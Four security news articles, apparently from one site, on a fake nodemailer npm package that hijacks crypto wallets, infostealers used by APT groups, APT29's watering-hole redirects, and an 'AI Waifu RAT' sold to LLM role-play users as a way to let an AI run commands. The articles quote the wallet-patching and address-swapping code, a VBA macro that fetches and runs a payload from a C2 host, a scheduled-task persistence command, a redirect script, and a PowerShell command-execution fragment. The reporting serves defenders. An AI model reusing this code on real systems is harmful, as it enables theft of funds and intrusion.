Security researchers at Socket.dev uncovered a sophisticated supply chain attack in late August 2025 leveraging a malicious npm package named nodejs-smtp, which masquerades as the widely used email library nodemailer, boasting approximately 3.9 million weekly downloads.

At first glance, nodejs-smtp operates identically to its legitimate counterpart, supplying a familiar API and successfully dispatching emails.

This deceptive functionality serves as a Trojan horse, engaging quietly in covert operations that prey on desktop cryptocurrency wallets installed on Windows systems.

As organizations continued to integrate open-source dependencies into their development pipelines, attackers recognized the potency of import-time tampering.

Socket.dev analysts noted that upon import, nodejs-smtp immediately invokes an Electron-based payload designed to infiltrate wallets such as Atomic Wallet and Exodus.

By unpacking the wallet’s app.asar archive, replacing a critical vendor bundle with malicious code, and then repackaging the archive, the attacker ensures persistence and stealth.

Following this manipulation, any transaction initiated by the compromised wallet is rerouted, substituting the intended recipient address with one controlled by the threat actor.

Socket.dev analysts further identified that the threat actor, operating under the npm alias nikotimon, embeds hardcoded wallet addresses directly into the injected payload.

These addresses include Bitcoin, Ethereum, Tether (both ERC-20 and TRC-20), XRP, and Solana, facilitating multichain theft.

Although initial download counts for nodejs-smtp were relatively low—approximately 342 at the time of discovery—the potential for widespread compromise remains high given nodemailer’s ubiquity in production environments.

In light of these findings, developers and security teams are urged to adopt rigorous supply chain defenses.

Recommended measures include real-time analysis of side-effect imports, strict enforcement of code-review policies for new dependencies, and deployment of automated tooling to flag archive-manipulation patterns during package installation.

The risk is amplified by the fact that build pipelines and continuous integration systems are unlikely to detect such tampering when dependencies appear functionally correct.

Infection Mechanism and Persistence Tactics

Delving deeper into nodejs-smtp’s infection strategy reveals a two-stage process that exploits Electron’s packaging format.

In the first stage, the package’s lib/engine/index.js script executes immediately upon import:-

// lib/engine/index.js
const os = require('os');
const fs = require('fs').promises;
const path = require('path');
const asar = require('asar');

async function patchAtomic() {
  try {
    const base    = path.join(os.homedir(), 'AppData', 'Local', 'Programs');
    const resDir  = path.join(base, 'atomic', 'resources');
    const asarIn  = path.join(resDir, 'app.asar');
    const workDir = path.join(resDir, 'output');
    const implant = path.join(__dirname, 'a.js');
    const target  = path.join(workDir, 'dist', 'electron', 'vendors.64b69c3b00e2a7914733.js');

    await fs.mkdir(workDir, { recursive: true });
    asar.extractAll(asarIn, workDir);
    await fs.copyFile(implant, target);
    asar.createPackage(workDir, asarIn);
    await fs.rm(workDir, { recursive: true, force: true });
  } catch {}
}

patchAtomic();

This routine unpacks the wallet archive, overwrites the vendor bundle with the malicious payload a.js, and repackages the integrity-checked archive to mask traces.

Upon the next wallet launch, a.js intercepts transaction construction and replaces the recipient address, ensuring every outgoing payment is diverted:

// lib/engine/a.js
async sendCoins() {
  if (await this.validatePassword()) {
    if (this.coin.ticker === 'BTC')
      this.inputs.address = '17CNLs7rHnnBsmsCWoTq7EakGZKEp5wpdy';
    else if (this.coin.ticker === 'ETH' || this.coin.ticker === 'USDT')
      this.inputs.address = '0x26Ce898b746910ccB21F4C6316A5e85BCEa39e24';
    // Additional mappings for TRX-USDT, XRP, SOL omitted
  }
}

By executing during import, nodejs-smtp avoids detection by static scanners that only inspect function calls at runtime. This persistent, import-time hook highlights the evolving threat landscape within open-source ecosystems, underscoring the need for supply chain–aware security measures.

Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.

The post Malicious npm Package Mimics as Popular Nodemailer with Weekly 3.9 Million Downloads to Hijack Crypto Transactions appeared first on Cyber Security News.

Infostealer malware, initially designed to indiscriminately harvest credentials from compromised hosts, has evolved into a potent weapon for state-sponsored Advanced Persistent Threat (APT) groups.

Emerging in early 2023, families such as RedLine, Lumma, and StealC quickly proliferated across phishing campaigns and malicious downloads.

These infostealers cast wide nets, siphoning browser data, cookies, and system information, but recent intelligence reveals a troubling shift: stolen credentials are now being weaponized for highly targeted espionage operations.

The primary attack vectors for infostealers remain spear-phishing emails laced with macro-enabled documents or fake software installers.

Victims receive a Word attachment with a VBA macro that, when enabled, downloads the stealer payload from a command-and-control (C2) server.

Upon execution, the malware locates and exfiltrates stored credentials for email, VPN, and corporate SSO portals.

Infostealers analysts noted that compromised diplmatic credentials from multiple Ministries of Foreign Affairs have appeared in darknet dumps, providing authenticated access to high-value targets.

Impact assessments indicate that once APT groups gain valid diplomatic mailbox credentials—often via Infostealer infections—they can craft near-indistinguishable spear-phishing campaigns.

These campaigns bypass traditional detection by leveraging trusted sender reputations and valid TLS certificates.

By mid-2025, Hudson Rock’s threat intelligence platform detected over 1,400 compromised users at Qatar’s MFA and hundreds more across Saudi Arabia, South Korea, and the UAE, underscoring the global scale of this threat.

In one high-profile incident, a compromised Omani embassy account in Paris was used to relay malicious invites to UN officials. The email contained a Word document with a “sysProcUpdate” macro that executed the following VBA code snippet:

Sub AutoOpen()
    Dim objXML As Object
    Set objXML = CreateObject("MSXML2.XMLHTTP")
    objXML.Open "GET", "https://malicious.c2.server/payload.exe", False
    objXML.Send
    If objXML.Status = 200 Then
        With CreateObject("ADODB.Stream")
            .Type = 1
            .Open
            .Write objXML.responseBody
            .SaveToFile Environ("TEMP") & "\update.exe", 2
        End With
        Shell Environ("TEMP") & "\update.exe", vbHide
    End If
End Sub

Following delivery, the “update.exe” payload establishes persistence by creating a Windows Scheduled Task:

schtasks /Create /SC MINUTE /MO 15 /TN "SysProcUpdate" /TR "%TEMP%\update.exe"

Infostealers researchers identified that this persistence mechanism ensures repeat execution even after system reboots, facilitating long-term access.

Infection Mechanism

Delving deeper into the infection mechanism, infostealers exploit user trust and insufficient endpoint controls.

After initial compromise via phishing, the payload leverages common Windows APIs—such as CryptUnprotectData—to decrypt stored credentials from browsers and the Windows Credential Manager.

The exfiltration module then packages harvested data into encrypted blobs and transmits them over HTTPS to evade intrusion detection systems.

Once credentials reach the attacker’s infrastructure, APT groups use them as legitimate logins, bypassing multi-factor authentication in cases where only user-pass credentials are enforced.

By embedding the malware within routine-looking documents and mimicking legitimate maintenance tasks, infostealers maintain a low-and-slow profile, making detection exceptionally challenging.

This seamless exploitation of credential theft for targeted campaigns marks a worrying evolution in cyber-espionage tactics.

Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.

The post Infostealer Malware is Being Exploited by APT Groups for Targeted Attacks appeared first on Cyber Security News.

Amazon’s threat intelligence team uncovered a sophisticated watering hole campaign in late August 2025, which is orchestrated by APT29, also known as Midnight Blizzard, a Russian Foreign Intelligence Service–linked actor.

The operation relied on the compromise of legitimate websites to redirect unsuspecting visitors to malicious infrastructure.

Once redirected, users encountered counterfeit Cloudflare verification pages designed to harvest credentials and trick victims into authorizing attacker-controlled devices through Microsoft’s device code authentication flow.

The campaign’s breadth was striking: approximately 10 percent of site visitors were siphoned off to actor-controlled domains such as findcloudflare[.]com and cloudflare.redirectpartners[.]com.

These domains mimicked official security checks so convincingly that many users failed to detect the ruse.

Amazon analysts noted that this approach marked a significant evolution in APT29’s tradecraft. Instead of relying solely on phishing emails or targeted spear-phishing, the group employed opportunistic injection of obfuscated JavaScript into compromised sites.

This tactic broadened their potential victim pool by embedding malicious redirects directly into popular web pages.

Visitors were often unaware they were being rerouted until prompted to enter device codes or approve new device authorizations—actions that granted the threat actor persistent access.

The impact of this campaign extended beyond mere credential theft. By integrating with Microsoft’s device code authentication, APT29 could persist within corporate environments, leveraging authorized sessions to move laterally and gather intelligence.

Although no AWS systems were compromised, the incident underscored the persistent threat posed by state-sponsored actors adapting their methods to evade traditional defenses.

Amazon worked rapidly with Cloudflare, Microsoft, and other providers to dismantle the malicious domains and isolate compromised EC2 instances, illustrating the power of coordinated industry response.

Technical Overview of Obfuscated JavaScript

A closer look at the injected script reveals several advanced evasion techniques. The JavaScript payload was base64-encoded to mask its true purpose, and randomization logic redirected only a subset of visitors, reducing the likelihood of detection.

Once decoded, the snippet performed a server-side redirect to the fraudulent authentication page while setting cookies to prevent repeated redirects of the same user. A simplified version of the decoded code appears below:-

(function(){
    var uid = Math.random().toString(36).substring(2);
    if (!document.cookie.includes('redir='+uid) && Math.random()<0.1) {
        document. Cookie = 'redir='+uid+';path=/';
        window.location.replace('https://findcloudflare.com/device/code?auth=' + uid);
    }
})();

This snippet exemplifies APT29’s shift from client-side to server-side redirects when previous infrastructure was disrupted.

By rapidly migrating to new domains and refining their code, the group sustained their campaign despite ongoing takedowns.

Amazon’s successful disruption of this infrastructure highlights the necessity for continuous monitoring of web-based threats and collaboration across the security community.

Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.

The post Amazon Dismantles Russian APT 29 Infrastructure Used to Attack Users appeared first on Cyber Security News.

A sophisticated malware campaign targeting niche Large Language Model (LLM) role-playing communities has emerged, leveraging advanced social engineering tactics to distribute a dangerous Remote Access Trojan (RAT).

The malware, dubbed “AI Waifu RAT” by security researchers, masquerades as an innovative AI character enhancement tool that promises “meta” interactions between users and their virtual AI companions.

The attack begins with a deceptively appealing proposition posted in LLM role-playing forums.

The threat actor introduces their creation as a research project that allows users’ AI character “Win11 Waifu” to break the fourth wall and interact directly with their real-world computer systems.

This marketing approach exploits the community’s fascination with advanced AI capabilities and novel interactions, presenting Arbitrary Code Execution (ACE) as a desirable feature rather than a critical security vulnerability.

The malware’s distribution method represents a masterclass in targeted social engineering, specifically designed to prey on the technical curiosity and trust within these specialized communities.

An analyst Ryingo identified the threat after discovering its active circulation and conducted an extensive technical analysis that revealed the true nature of this seemingly innocent “research project.”

The threat actor, operating under multiple aliases including KazePsi and PsionicZephyr, presents themselves as a legitimate CTF (Capture The Flag) player and cybersecurity researcher.

However, investigation reveals no credible evidence of their participation in legitimate security competitions or research.

Instead, their technical implementation demonstrates poor coding practices and rudimentary security knowledge inconsistent with genuine cybersecurity expertise.

Technical Architecture and Command Structure

The AI Waifu RAT operates through a straightforward yet effective architecture. The malware establishes a local HTTP server listening on port 9999, creating a communication channel between the victim’s system and the LLM-controlled interface.

This design choice enables seamless integration with web-based AI platforms while maintaining persistent access to the infected machine.

The RAT exposes three primary command and control endpoints that facilitate comprehensive system compromise.

The /execute_trusted endpoint represents the most dangerous component, accepting plaintext JSON commands and executing them directly through PowerShell processes.

The implementation shows:-

qmemcpy(ps_cmd, "$OutputEncoding = [System.Text.Encoding]::UTF8;", 48);
memcpy(ps_cmd + 48, remote_cmd, ttlSize); // merge remote cmd

This code snippet demonstrates how the malware prepends UTF-8 encoding commands to user-supplied instructions before execution, enabling arbitrary command execution on the victim’s system.

The /execute endpoint includes a superficial security prompt that can be bypassed entirely by using the trusted endpoint, rendering the protection mechanism ineffective.

Additionally, the /readfile endpoint allows complete filesystem access, enabling data exfiltration and reconnaissance activities.

The malware’s persistence mechanism involves writing registry entries to ensure automatic startup, while its evasion techniques include instructing users to disable antivirus software under the guise of eliminating “false positives.”

This social engineering approach effectively neutralizes the primary defense layer, allowing the malware to operate undetected on compromised systems.

Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.

The post AI Waifu RAT Attacking Users With Novel Social Engineering Techniques appeared first on Cyber Security News.